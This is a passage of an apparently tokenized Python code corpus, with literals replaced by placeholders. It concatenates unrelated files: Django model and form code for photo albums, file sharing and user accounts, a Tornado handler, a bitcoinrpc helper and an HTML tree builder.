modelsinspector import add_introspection_rules <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ ArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : "<STR_LIT:int>" } ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ TextArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ FloatArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ IntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ BigIntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ SmallIntegerArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ DateTimeArrayField ] , <EOL> [ ] , <EOL> { <EOL> 
"<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> add_introspection_rules ( [ <EOL> ( <EOL> [ DateArrayField ] , <EOL> [ ] , <EOL> { <EOL> "<STR_LIT>" : [ "<STR_LIT>" , { "<STR_LIT:default>" : <NUM_LIT:1> } ] , <EOL> "<STR_LIT:null>" : [ "<STR_LIT:null>" , { "<STR_LIT:default>" : True } ] , <EOL> } <EOL> ) <EOL> ] , [ "<STR_LIT>" ] ) <EOL> except ImportError : <EOL> pass </s>
<s> from django . db import models <EOL> from django . conf import settings <EOL> from django . template . defaultfilters import slugify <EOL> from django . contrib . contenttypes import generic <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from niwi . contrib . db . fields import CreationDateTimeField <EOL> from niwi . contrib . db . fields import ModificationDateTimeField <EOL> from niwi . contrib . db . fields import DictField <EOL> from niwi . web . models import slugify_uniquely <EOL> from niwi . photo . image import ImageAdapter <EOL> import datetime , uuid , tempfile , os <EOL> class Album ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> , unique = True ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:200> , unique = True , db_index = True ) <EOL> owner = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , blank = True ) <EOL> created_date = CreationDateTimeField ( editable = True ) <EOL> modified_date = ModificationDateTimeField ( editable = True ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . name ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , ( ) , { '<STR_LIT>' : self . slug } ) <EOL> class Photo ( models . Model ) : <EOL> album = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' ) <EOL> small_description = models . CharField ( max_length = <NUM_LIT> ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:200> , unique = True , db_index = True ) <EOL> description = models . TextField ( blank = True ) <EOL> exifdata = DictField ( editable = True ) <EOL> original = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' ) <EOL> large = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> medium = models . 
ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> small = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True ) <EOL> square = models . ImageField ( max_length = <NUM_LIT:200> , upload_to = '<STR_LIT>' , <EOL> serialize = False , editable = True , blank = True , null = True ) <EOL> owner = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , blank = True ) <EOL> created_date = CreationDateTimeField ( editable = True ) <EOL> modified_date = ModificationDateTimeField ( editable = True ) <EOL> show_on_home = models . BooleanField ( default = True ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . small_description ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> if not self . slug : <EOL> self . slug = slugify_uniquely ( self . small_description , self . __class__ ) <EOL> super ( Photo , self ) . save ( * args , ** kwargs ) <EOL> @ property <EOL> def desc_html ( self ) : <EOL> return u"<STR_LIT>" % ( '<STR_LIT>' , self . small_description ) <EOL> @ models . permalink <EOL> def get_absolute_url ( self ) : <EOL> return ( '<STR_LIT>' , ( ) , <EOL> { '<STR_LIT>' : self . album . slug , '<STR_LIT>' : self . slug } ) <EOL> def rehash_thumbnails ( self , commit = False ) : <EOL> if self . large and os . path . exists ( self . large . path ) : <EOL> os . remove ( self . large . path ) <EOL> if self . medium and os . path . exists ( self . medium . path ) : <EOL> os . remove ( self . medium . path ) <EOL> if self . small and os . path . exists ( self . small . path ) : <EOL> os . remove ( self . small . path ) <EOL> if self . square and os . path . exists ( self . square . path ) : <EOL> os . remove ( self . square . path ) <EOL> f1 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . large = ImageAdapter . resize ( self . 
original . path , f1 , <NUM_LIT> ) <EOL> f2 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . medium = ImageAdapter . resize ( self . original . path , f2 , <NUM_LIT> ) <EOL> f3 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . small = ImageAdapter . resize ( self . original . path , f3 , <NUM_LIT> ) <EOL> f4 = tempfile . NamedTemporaryFile ( suffix = "<STR_LIT>" , delete = True ) <EOL> self . square = ImageAdapter . square ( self . original . path , f4 ) <EOL> self . exifdata = ImageAdapter . get_exif_dict ( self . original . path ) <EOL> if commit : <EOL> self . save ( ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from django . http import HttpResponse , HttpResponseRedirect <EOL> from django . views . decorators . cache import cache_page <EOL> from django . core . urlresolvers import reverse <EOL> from django . shortcuts import render_to_response , get_object_or_404 <EOL> from niwi . niwi . views . generic import GenericView <EOL> from niwi . niwi_apps . filepaste . models import WebFile <EOL> from niwi . niwi_apps . filepaste . forms import UploadForm , DownloadForm <EOL> import os . path <EOL> class WebFileDownload ( GenericView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get ( self , request , slug ) : <EOL> wfile = get_object_or_404 ( WebFile , slug = slug ) <EOL> if not wfile . password : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = wfile . attached_file . url <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % os . path . basename ( wfile . attached_file . name ) <EOL> return response <EOL> form = DownloadForm ( wfile = wfile ) <EOL> return self . render_to_response ( self . template_name , <EOL> { '<STR_LIT>' : form , '<STR_LIT:file>' : wfile } ) <EOL> def post ( self , request , slug ) : <EOL> wfile = get_object_or_404 ( WebFile , slug = slug ) <EOL> form = DownloadForm ( request . POST , wfile = wfile ) <EOL> if form . is_valid ( ) : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ '<STR_LIT>' ] = wfile . attached_file . url <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % os . path . basename ( wfile . attached_file . name ) <EOL> return response <EOL> return self . render_to_response ( self . template_name , <EOL> { '<STR_LIT>' : form , '<STR_LIT:file>' : wfile } ) <EOL> class WebFileUpload ( GenericView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get ( self , request ) : <EOL> form = UploadForm ( ) <EOL> return self . render_to_response ( self . 
template_name , { '<STR_LIT>' : form } ) <EOL> def post ( self , request ) : <EOL> form = UploadForm ( request . POST , request . FILES ) <EOL> if form . is_valid ( ) : <EOL> wfile = form . save ( commit = False ) <EOL> if form . cleaned_data [ '<STR_LIT:password>' ] : <EOL> wfile . set_password ( form . cleaned_data [ '<STR_LIT:password>' ] ) <EOL> wfile . save ( ) <EOL> return HttpResponseRedirect ( reverse ( "<STR_LIT>" ) ) <EOL> return self . render_to_response ( self . template_name , { '<STR_LIT>' : form } ) </s>
<s> import tornado . web <EOL> class BaseHandler ( tornado . web . RequestHandler ) : <EOL> @ property <EOL> def db ( self ) : <EOL> return self . application . db <EOL> @ property <EOL> def session ( self ) : <EOL> return self . application . session_engine <EOL> def on_finish ( self ) : <EOL> if self . session and self . session . is_modified : <EOL> self . session . save ( ) <EOL> super ( BaseHandler , self ) . on_finish ( ) </s>
<s> import os , sys <EOL> class Params : <EOL> homepage = '<STR_LIT>' <EOL> cache = '<STR_LIT>' <EOL> credentials = '<STR_LIT>' <EOL> refreshurl = '<STR_LIT>' <EOL> refreshLabel = '<STR_LIT>' <EOL> refreshAtBottom = False <EOL> alink = "<STR_LIT>" <EOL> vlink = "<STR_LIT>" <EOL> link = "<STR_LIT>" <EOL> bgcolor = "<STR_LIT>" <EOL> text = "<STR_LIT>" <EOL> font = "<STR_LIT>" <EOL> cols = <NUM_LIT:4> <EOL> tags = '<STR_LIT>' <EOL> caseSensitive = False <EOL> title = '<STR_LIT>' <EOL> titleColor = "<STR_LIT>" <EOL> addDatestampCopy = True <EOL> verbose = True <EOL> def SetCredentials ( self , username , password ) : <EOL> self . username = username <EOL> self . password = password </s>
<s> """<STR_LIT:U+0020>""" <EOL> from __future__ import absolute_import <EOL> __version__ = '<STR_LIT>' <EOL> from . sempervirens import * </s>
<s> import bitcoinrpc <EOL> def get_connection ( node ) : <EOL> return bitcoinrpc . connect_to_remote ( <EOL> node . rpcuser_decrypted , <EOL> node . rpcpass_decrypted , <EOL> host = node . rpchost , <EOL> port = node . rpcport , <EOL> use_https = node . rpchttps , <EOL> ) </s>
<s> from parsley . decorators import parsleyfy <EOL> from django import forms <EOL> from django . contrib . auth import get_user_model <EOL> from django . forms . formsets import BaseFormSet <EOL> from django . contrib . auth . forms import UserCreationForm , UserChangeForm <EOL> from django . contrib . auth . tokens import default_token_generator <EOL> from django . contrib . sites . models import Site <EOL> from django . contrib . sites . shortcuts import get_current_site <EOL> from django . template import loader <EOL> from django . utils . encoding import force_bytes <EOL> from django . utils . http import urlsafe_base64_encode <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from connect . accounts . models import CustomUser , Role , Skill , UserSkill <EOL> from connect . accounts . utils import ( <EOL> get_user , invite_user_to_reactivate_account , validate_email_availability <EOL> ) <EOL> User = get_user_model ( ) <EOL> @ parsleyfy <EOL> class CustomPasswordResetForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> email = forms . EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> max_length = <NUM_LIT> , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def save ( self , domain_override = None , <EOL> subject_template_name = '<STR_LIT>' , <EOL> email_template_name = '<STR_LIT>' , <EOL> use_https = False , token_generator = default_token_generator , <EOL> from_email = None , request = None , html_email_template_name = None ) : <EOL> """<STR_LIT>""" <EOL> from django . core . mail import send_mail <EOL> email = self . cleaned_data [ "<STR_LIT:email>" ] <EOL> active_users = User . _default_manager . filter ( <EOL> email__iexact = email , is_active = True ) <EOL> for user in active_users : <EOL> if not user . 
has_usable_password ( ) : <EOL> continue <EOL> if not domain_override : <EOL> site = get_current_site ( request ) <EOL> domain = site . domain <EOL> else : <EOL> site = Site ( name = domain_override , <EOL> domain = domain_override ) <EOL> domain = site . domain <EOL> context = { <EOL> '<STR_LIT:email>' : user . email , <EOL> '<STR_LIT>' : domain , <EOL> '<STR_LIT>' : site , <EOL> '<STR_LIT>' : urlsafe_base64_encode ( force_bytes ( user . pk ) ) , <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : token_generator . make_token ( user ) , <EOL> '<STR_LIT>' : '<STR_LIT>' if use_https else '<STR_LIT:http>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> subject = loader . render_to_string ( subject_template_name , context ) <EOL> subject = '<STR_LIT>' . join ( subject . splitlines ( ) ) <EOL> email = loader . render_to_string ( email_template_name , context ) <EOL> if html_email_template_name : <EOL> html_email = loader . render_to_string ( html_email_template_name , <EOL> context ) <EOL> else : <EOL> html_email = None <EOL> send_mail ( subject , email , from_email , <EOL> [ user . email ] , html_message = html_email ) <EOL> class CustomUserCreationForm ( UserCreationForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CustomUserCreationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if '<STR_LIT:username>' in self . fields : <EOL> del self . fields [ '<STR_LIT:username>' ] <EOL> class Meta : <EOL> model = CustomUser <EOL> fields = ( "<STR_LIT:email>" , ) <EOL> class CustomUserChangeForm ( UserChangeForm ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( CustomUserChangeForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if '<STR_LIT:username>' in self . fields : <EOL> del self . fields [ '<STR_LIT:username>' ] <EOL> class Meta : <EOL> model = CustomUser <EOL> fields = ( "<STR_LIT:email>" , ) <EOL> @ parsleyfy <EOL> class RequestInvitationForm ( forms . 
Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . request = kwargs . pop ( '<STR_LIT>' , None ) <EOL> super ( RequestInvitationForm , self ) . __init__ ( * args , ** kwargs ) <EOL> full_name = forms . CharField ( <EOL> max_length = <NUM_LIT:30> , <EOL> error_messages = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } <EOL> ) <EOL> email = forms . EmailField ( <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> comments = forms . CharField ( <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> } <EOL> ) <EOL> def clean_email ( self ) : <EOL> """<STR_LIT>""" <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> user = get_user ( email ) <EOL> if user : <EOL> if user . is_closed : <EOL> invite_user_to_reactivate_account ( user , request = self . request ) <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> return email <EOL> @ parsleyfy <EOL> class ActivateAccountForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( ActivateAccountForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> initial = self . user . full_name , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> password = forms . CharField ( <EOL> widget = forms . PasswordInput , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> confirm_password = forms . CharField ( <EOL> widget = forms . 
PasswordInput , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> cleaned_data = super ( ActivateAccountForm , self ) . clean ( ) <EOL> password1 = cleaned_data . get ( '<STR_LIT:password>' ) <EOL> password2 = cleaned_data . get ( '<STR_LIT>' ) <EOL> if password1 != password2 : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' ) <EOL> return cleaned_data <EOL> class BaseSkillFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> if any ( self . errors ) : <EOL> return <EOL> skills = [ ] <EOL> for form in self . forms : <EOL> if form . cleaned_data : <EOL> skill = form . cleaned_data [ '<STR_LIT>' ] <EOL> proficiency = form . cleaned_data [ '<STR_LIT>' ] <EOL> if skill and proficiency : <EOL> if skill in skills : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> skills . append ( skill ) <EOL> if skill and not proficiency : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> elif proficiency and not skill : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> @ parsleyfy <EOL> class SkillForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> skills = Skill . objects . all ( ) <EOL> skill = forms . ModelChoiceField ( queryset = skills , required = False ) <EOL> proficiency = forms . ChoiceField ( choices = UserSkill . PROFICIENCY_CHOICES , <EOL> required = False ) <EOL> class BaseLinkFormSet ( BaseFormSet ) : <EOL> def clean ( self ) : <EOL> """<STR_LIT>""" <EOL> if any ( self . errors ) : <EOL> return <EOL> anchors = [ ] <EOL> urls = [ ] <EOL> duplicates = False <EOL> for form in self . forms : <EOL> if form . cleaned_data : <EOL> anchor = form . cleaned_data [ '<STR_LIT>' ] <EOL> url = form . 
cleaned_data [ '<STR_LIT:url>' ] <EOL> if anchor and url : <EOL> if anchor in anchors : <EOL> duplicates = True <EOL> anchors . append ( anchor ) <EOL> if url in urls : <EOL> duplicates = True <EOL> urls . append ( url ) <EOL> if duplicates : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> if url and not anchor : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> elif anchor and not url : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> @ parsleyfy <EOL> class LinkForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> anchor = forms . CharField ( max_length = <NUM_LIT:100> , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } ) , <EOL> required = False ) <EOL> url = forms . URLField ( <EOL> widget = forms . URLInput ( attrs = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } ) , <EOL> error_messages = { '<STR_LIT>' : _ ( '<STR_LIT>' ) } , <EOL> required = False ) <EOL> class RoleModelMultipleChoiceField ( forms . ModelMultipleChoiceField ) : <EOL> def label_from_instance ( self , obj ) : <EOL> label = "<STR_LIT>" . format ( obj . name , obj . description ) <EOL> return mark_safe ( label ) <EOL> @ parsleyfy <EOL> class ProfileForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( ProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> max_length = <NUM_LIT:30> , <EOL> initial = self . user . full_name , <EOL> widget = forms . TextInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT:Name>' ) , <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> initial = self . user . bio , <EOL> widget = forms . 
Textarea ( attrs = { <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) , <EOL> required = False ) <EOL> roles = Role . objects . all ( ) <EOL> self . fields [ '<STR_LIT>' ] = RoleModelMultipleChoiceField ( <EOL> initial = self . user . roles . all ( ) , <EOL> queryset = roles , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) <EOL> @ parsleyfy <EOL> class UpdateEmailForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( UpdateEmailForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:email>' ] = forms . EmailField ( <EOL> initial = self . user . email , <EOL> widget = forms . EmailInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } ) <EOL> def clean_email ( self ) : <EOL> email = self . cleaned_data [ '<STR_LIT:email>' ] <EOL> if email != self . user . email : <EOL> validate_email_availability ( email ) <EOL> return email <EOL> def clean_password ( self ) : <EOL> password = self . cleaned_data [ '<STR_LIT:password>' ] <EOL> if not self . user . check_password ( password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass <EOL> @ parsleyfy <EOL> class UpdatePasswordForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( UpdatePasswordForm , self ) . 
__init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> self . fields [ '<STR_LIT>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean_current_password ( self ) : <EOL> current_password = self . cleaned_data [ '<STR_LIT>' ] <EOL> if not self . user . check_password ( current_password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass <EOL> @ parsleyfy <EOL> class CloseAccountForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . user = kwargs . pop ( '<STR_LIT:user>' , None ) <EOL> super ( CloseAccountForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:password>' ] = forms . CharField ( <EOL> widget = forms . PasswordInput ( attrs = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) , <EOL> error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } ) <EOL> def clean_password ( self ) : <EOL> """<STR_LIT>""" <EOL> password = self . cleaned_data . get ( '<STR_LIT:password>' ) <EOL> if not self . user . check_password ( password ) : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) , <EOL> code = '<STR_LIT>' <EOL> ) <EOL> else : <EOL> pass </s>
<s> from django import forms <EOL> from connect . accounts . models import Role , Skill <EOL> class FilterMemberForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> skills = forms . ModelMultipleChoiceField ( <EOL> queryset = Skill . objects . all ( ) , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) <EOL> roles = forms . ModelMultipleChoiceField ( <EOL> queryset = Role . objects . all ( ) , <EOL> widget = forms . CheckboxSelectMultiple ( ) , <EOL> required = False ) </s>
<s> import htmlentitydefs <EOL> import re , string , sys <EOL> import mimetools , StringIO <EOL> import ElementTree <EOL> AUTOCLOSE = "<STR_LIT:p>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:body>" <EOL> IGNOREEND = "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> if sys . version [ : <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> is_not_ascii = re . compile ( r"<STR_LIT>" ) . search <EOL> else : <EOL> is_not_ascii = re . compile ( eval ( r'<STR_LIT>' ) ) . search <EOL> try : <EOL> from HTMLParser import HTMLParser <EOL> except ImportError : <EOL> from sgmllib import SGMLParser <EOL> class HTMLParser ( SGMLParser ) : <EOL> def unknown_starttag ( self , tag , attrs ) : <EOL> self . handle_starttag ( tag , attrs ) <EOL> def unknown_endtag ( self , tag ) : <EOL> self . handle_endtag ( tag ) <EOL> class HTMLTreeBuilder ( HTMLParser ) : <EOL> def __init__ ( self , builder = None , encoding = None ) : <EOL> self . __stack = [ ] <EOL> if builder is None : <EOL> builder = ElementTree . TreeBuilder ( ) <EOL> self . __builder = builder <EOL> self . encoding = encoding or "<STR_LIT>" <EOL> HTMLParser . __init__ ( self ) <EOL> def close ( self ) : <EOL> HTMLParser . close ( self ) <EOL> return self . __builder . close ( ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> if tag == "<STR_LIT>" : <EOL> http_equiv = content = None <EOL> for k , v in attrs : <EOL> if k == "<STR_LIT>" : <EOL> http_equiv = string . lower ( v ) <EOL> elif k == "<STR_LIT:content>" : <EOL> content = v <EOL> if http_equiv == "<STR_LIT>" and content : <EOL> header = mimetools . Message ( <EOL> StringIO . StringIO ( "<STR_LIT>" % ( http_equiv , content ) ) <EOL> ) <EOL> encoding = header . getparam ( "<STR_LIT>" ) <EOL> if encoding : <EOL> self . encoding = encoding <EOL> if tag in AUTOCLOSE : <EOL> if self . __stack and self . __stack [ - <NUM_LIT:1> ] == tag : <EOL> self . handle_endtag ( tag ) <EOL> self . __stack . 
append ( tag ) <EOL> attrib = { } <EOL> if attrs : <EOL> for k , v in attrs : <EOL> attrib [ string . lower ( k ) ] = v <EOL> self . __builder . start ( tag , attrib ) <EOL> if tag in IGNOREEND : <EOL> self . __stack . pop ( ) <EOL> self . __builder . end ( tag ) <EOL> def handle_endtag ( self , tag ) : <EOL> if tag in IGNOREEND : <EOL> return <EOL> lasttag = self . __stack . pop ( ) <EOL> if tag != lasttag and lasttag in AUTOCLOSE : <EOL> self . handle_endtag ( lasttag ) <EOL> self . __builder . end ( tag ) <EOL> def handle_charref ( self , char ) : <EOL> if char [ : <NUM_LIT:1> ] == "<STR_LIT:x>" : <EOL> char = int ( char [ <NUM_LIT:1> : ] , <NUM_LIT:16> ) <EOL> else : <EOL> char = int ( char ) <EOL> if <NUM_LIT:0> <= char < <NUM_LIT> : <EOL> self . __builder . data ( chr ( char ) ) <EOL> else : <EOL> self . __builder . data ( unichr ( char ) ) <EOL> def handle_entityref ( self , name ) : <EOL> entity = htmlentitydefs . entitydefs . get ( name ) <EOL> if entity : <EOL> if len ( entity ) == <NUM_LIT:1> : <EOL> entity = ord ( entity ) <EOL> else : <EOL> entity = int ( entity [ <NUM_LIT:2> : - <NUM_LIT:1> ] ) <EOL> if <NUM_LIT:0> <= entity < <NUM_LIT> : <EOL> self . 